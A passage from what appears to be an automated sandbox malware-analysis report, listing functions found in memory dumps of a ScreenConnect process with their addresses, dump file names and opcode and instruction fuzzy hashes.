                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D416A307102159FDB68DF69D854AADBBF6BF89620B14916DE806E73A0DF709C04CB90
                                                                                                                                                                                                                                                          Function 02EE3678 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a50bca9ba8ec2f3e73900c60c008c861f5103926ccca8d761362abcbd3127cfa
                                                                                                                                                                                                                                                          • Instruction ID: 080626c22047e25736ce92c950599a47b68e224afd4180e59f82aa4d1326bfeb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a50bca9ba8ec2f3e73900c60c008c861f5103926ccca8d761362abcbd3127cfa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39414AB4600705CFCB24DF39D845AAAB7F2FF48325B149A68E4579B7A0DB30E845CB90
                                                                                                                                                                                                                                                          Function 02EE3DC0 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a9a5f0a8f1f74573c98d6479037bdfe01124d3a250da5a3fafbc497fc321f618
                                                                                                                                                                                                                                                          • Instruction ID: e38314a8702d4ce8a83dec3595824419f6b38bd130c3732630d49eff4a8a4254
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9a5f0a8f1f74573c98d6479037bdfe01124d3a250da5a3fafbc497fc321f618
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9316F31B502058BDF14EE69C4946BFF7F5EF8A254F0494AAE406E7360DB709C018B90
                                                                                                                                                                                                                                                          Function 02EE3828 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8fa43e0be16ea78447d82a2128608c4175da67611dae4dddbeb83577421482d9
                                                                                                                                                                                                                                                          • Instruction ID: af4dc908ec87d7f9c014b6b20cc44bae2e6202d522c768034160a453fc58cc48
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fa43e0be16ea78447d82a2128608c4175da67611dae4dddbeb83577421482d9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9431D031F402098FDB04AB68D8557AEBBB6EFC9210B1481A9D81ADB385DF319C06CB95
                                                                                                                                                                                                                                                          Function 02EE392C Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a6108ed3fb0bf633d8692f8b2c02e1ef0df70536638e83cb2810d3f66ab5cb00
                                                                                                                                                                                                                                                          • Instruction ID: 68c8208df066308aab3781ac77fe32ea3fc19481308df730a31e0d5acfd0266c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6108ed3fb0bf633d8692f8b2c02e1ef0df70536638e83cb2810d3f66ab5cb00
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D321F33394E3C44FC71A8631AC472E97F24DE8367932D80CFD1858B2A7C65A4986C782
                                                                                                                                                                                                                                                          Function 02EE5548 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8be932c3d4fc3c04e85c39a39ace04fb8a36cfe7addfef7fbb9cff91b36e446e
                                                                                                                                                                                                                                                          • Instruction ID: a52ee580fc6f0e52ea0ab837bb9c21c694f94595a6588760a6eb71ec10ce9489
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8be932c3d4fc3c04e85c39a39ace04fb8a36cfe7addfef7fbb9cff91b36e446e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A3116706007058FCB34CF29D884A6AB7F2BF89629B549A2CD496DB7A0D730E905CB91
                                                                                                                                                                                                                                                          Function 02EE5FB7 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3ce84f26fd1d1e2343d19efaf8de554bce345898decc50e655c5402c7f5132b8
                                                                                                                                                                                                                                                          • Instruction ID: 23c58753d489d04dadc72f77df53fb36ee3a5fd7f3851af98aaf0903a53cc16f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ce84f26fd1d1e2343d19efaf8de554bce345898decc50e655c5402c7f5132b8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA1103313406005BCB20865A9D51A57BBEBEFC1668F68C929F05ACB242EF20EC01C791
                                                                                                                                                                                                                                                          Function 02EE50C1 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5a5f432ef427a18f7ad62ea5a25d1877673c494d473046e63d91a77c4f263e9e
                                                                                                                                                                                                                                                          • Instruction ID: ac344d10848bf674fc5f660f1828cbb31a61f2f5e30f5fe5c76672f05e99b176
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a5f432ef427a18f7ad62ea5a25d1877673c494d473046e63d91a77c4f263e9e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED21C3317102055BDB14DB68DC517AE7BE2FBC9610F44852AD5059B340DF346C05CBE9
                                                                                                                                                                                                                                                          Function 02EE4B70 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a1e43277739fc22fb25d272b5edd3c3959a7d2c720cab23bf07369b3e7402050
                                                                                                                                                                                                                                                          • Instruction ID: 74d4f30237020293d216686e181b4a6b14dbe73b6458a28597e30324741e1733
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1e43277739fc22fb25d272b5edd3c3959a7d2c720cab23bf07369b3e7402050
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 642119702006058FDB35CF26D84869AB7F1AF85324B109A2DD497976E1DB31E94ACFA0
                                                                                                                                                                                                                                                          Function 02EE50D0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 00eeef4473f08088996a3aa2b7e4f55dc2c3fb5d5aa4d1e052834aadc36ad626
                                                                                                                                                                                                                                                          • Instruction ID: 95c66925f1c68ec846e6221874480c30fe5e16a922a8ab90eb7a8bc8a41aa1c2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00eeef4473f08088996a3aa2b7e4f55dc2c3fb5d5aa4d1e052834aadc36ad626
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D811E2317102156BEB18EB68DC80BAE77E3FBC9620F448529E505AB344DF30AC05CBE9
                                                                                                                                                                                                                                                          Function 02EE4F40 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9256cf0252a6c53cd568c68258421072207637230cc65215a99b9b3fab72378e
                                                                                                                                                                                                                                                          • Instruction ID: 07aef2108c2afc3a158945cb9f058a8668fa95533e4d57b0a051398fa955a966
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9256cf0252a6c53cd568c68258421072207637230cc65215a99b9b3fab72378e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7114F369002099FCF00DFA4CD80ADEBBF5FB49304F108569E508BB250E731BA0ACBA0
                                                                                                                                                                                                                                                          Function 02EE12A0 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9e49f633442388709533c05c5b965e8a869ab16792a02ca29fded5de139aae93
                                                                                                                                                                                                                                                          • Instruction ID: ed095d605667746f07b25744136ca294d743290933b4a26f7bfb3e96d3dbd226
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e49f633442388709533c05c5b965e8a869ab16792a02ca29fded5de139aae93
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C118231A00204AFCB51DE68DC006AE7BE5EB88620B04813DD80AE7741DB35ED028B94
                                                                                                                                                                                                                                                          Function 02EE6E58 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 746a2f0c6dd48e5479c0c090e8c8f5bfbef6d2319dc651482c28fa25b95fcca7
                                                                                                                                                                                                                                                          • Instruction ID: 48fc19acdd643120aecab536050baaefc57627ac3a1cc4b5b8ca24306a7d5220
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 746a2f0c6dd48e5479c0c090e8c8f5bfbef6d2319dc651482c28fa25b95fcca7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7901B131B00315ABCB14DA69DC0459BB7EDEBD8620714893AE805DB340DFB5ED0187D4
                                                                                                                                                                                                                                                          Function 02EE5035 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e6b247baf099709ddf674ee8e8c2bb91632585107959ff062ff0c1c7e4d054ed
                                                                                                                                                                                                                                                          • Instruction ID: 5b254963c76b0c1de48f9fd08614c7a84bd1bd4aa9cd03a03ddd0a47ac528169
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6b247baf099709ddf674ee8e8c2bb91632585107959ff062ff0c1c7e4d054ed
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E116A3194024DDFCF01DFA4D884ADDBBB2FF84218F98D548E006AB155DB31E946CBA1
                                                                                                                                                                                                                                                          Function 02EE1828 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 852f790e6d06c32002d991098b8e9c9a47e61d6ab654d474b1e6482a08bda67d
                                                                                                                                                                                                                                                          • Instruction ID: e8fa9c06306f53b91fa118e14556710a70a60723dd5fde5a993933d758b53e2e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 852f790e6d06c32002d991098b8e9c9a47e61d6ab654d474b1e6482a08bda67d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C811C030A44304CFCB69DB78D808A597BB5FF5522970580AAE46F8B225DB359C41CB59
                                                                                                                                                                                                                                                          Function 02EE4F50 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c6779557e101e1178e292759036f7a06fb9c353917ca61c27b532293f3fc2085
                                                                                                                                                                                                                                                          • Instruction ID: db7eb50018ca6070a22e49f5c4398cc38d48f1b554d6038189bace2ba74950a8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6779557e101e1178e292759036f7a06fb9c353917ca61c27b532293f3fc2085
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58111235A0021ADFCF10DFA4D9409DEBBF5FF49714B108569E509BB250E771AA1ACBA0
                                                                                                                                                                                                                                                          Function 0164D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828467715.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_164d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a223e8d5e334f8c6b6ce28ee9f71b0714b81a97ebc5155d36b59d446b094faca
                                                                                                                                                                                                                                                          • Instruction ID: 2d176299a740b00daec43d6e9f7db10fc16dd0c1a8a0f30e6a47836a2a884aca
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a223e8d5e334f8c6b6ce28ee9f71b0714b81a97ebc5155d36b59d446b094faca
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F601F731804344ABE7204E65CCC0B67BBD8EF51AA4F08C01AED480B282C3799442CAB1
                                                                                                                                                                                                                                                          Function 02EE4FD0 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8b229dd864eef19e506d7c53a54ce7f015bca07c2a2a8c045f688a26f72df7b4
                                                                                                                                                                                                                                                          • Instruction ID: d29eb025ea9e2d0a4afb6e9117d4bb7b74928df8131179e9b8b11840d8269b0f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b229dd864eef19e506d7c53a54ce7f015bca07c2a2a8c045f688a26f72df7b4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B01B132D00219DBCF04DFA9EC049CEBBBAFF88310F048426E405B7210DB316916CBA0
                                                                                                                                                                                                                                                          Function 02EE8168 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f9ae740584ed11b9679e577f9a3404b9d631dad1141e86102dd501a38557334e
                                                                                                                                                                                                                                                          • Instruction ID: 29ab522c7462a82bf0fed43a0c4b1d0d80b9ae3798580bf840ce614731c0ed72
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9ae740584ed11b9679e577f9a3404b9d631dad1141e86102dd501a38557334e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17F05836B082046BDB28CAAEA400A9BBBDACBC4224B14C07FE54DC3680EA31A5008764
                                                                                                                                                                                                                                                          Function 02EE0838 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 85d599776d358b3e02c92425abcd2c46e04dd9886493ce792ddd31f15a15103e
                                                                                                                                                                                                                                                          • Instruction ID: 0bfce978e6183e679470b3793d35574270bb36579deb90f3bdbdc514d4a09cad
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85d599776d358b3e02c92425abcd2c46e04dd9886493ce792ddd31f15a15103e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF02B70805348FFDF60CF78DC005AD3BB5FA52329B1491AAD809E7601D7755E06DB95
                                                                                                                                                                                                                                                          Function 0164D01C Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828467715.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_164d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 717f5b47a455f3939ca34a5b2dc5ba6a493e393ad4fdccd60c0dc9dcfa3ae672
                                                                                                                                                                                                                                                          • Instruction ID: e08b1c3035fcdbd95c46d94a6f536423c263f58d6c2f12675b99556ac122f319
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 717f5b47a455f3939ca34a5b2dc5ba6a493e393ad4fdccd60c0dc9dcfa3ae672
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F06271404344AFE7208E1ACCC4B63FF98EB51674F18C55AED584F287C3799844CAB1
                                                                                                                                                                                                                                                          Function 02EE8157 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 734b134bffdb708122d69f9d65d74d7b8252f4862cd5566840c33ccd5cc4b504
                                                                                                                                                                                                                                                          • Instruction ID: 78a4d1774427b125b82691d8e8bbb99e84625e3c88e80b4e4ff33cec3509a7a9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 734b134bffdb708122d69f9d65d74d7b8252f4862cd5566840c33ccd5cc4b504
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEE06D73A1C2582FD754CA6BAC01BABBBDECBC4224F15847EA94DD3640E920E5008278
                                                                                                                                                                                                                                                          Function 02EE1414 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 09f4437c289d64772f8b9495e826b1352b2491d20b12d4bdc7e874ca1e3b57d3
                                                                                                                                                                                                                                                          • Instruction ID: 7f419417bde96793eae336b0d1851191e12cdd3b021e7dcf69ef63e7f3bcdaaf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09f4437c289d64772f8b9495e826b1352b2491d20b12d4bdc7e874ca1e3b57d3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F09E634041540BE721C628EC517D62BD5EBA2230B0845DED446CF251D659F90A8769
                                                                                                                                                                                                                                                          Function 02EE5F68 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 45feb63c5e110d8b2754cdb905b72b665860c6a901afbfe5c01e29fb801e53ed
                                                                                                                                                                                                                                                          • Instruction ID: 6de3fc77a3da5628d6c6bf9863743af29de5aa66da08d1436ee618c166f44131
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45feb63c5e110d8b2754cdb905b72b665860c6a901afbfe5c01e29fb801e53ed
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EE09232761405ABCF40C15A9C4579276CFDB4816DFBDD631F426C7242FB10EC018292
                                                                                                                                                                                                                                                          Function 02EE1818 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
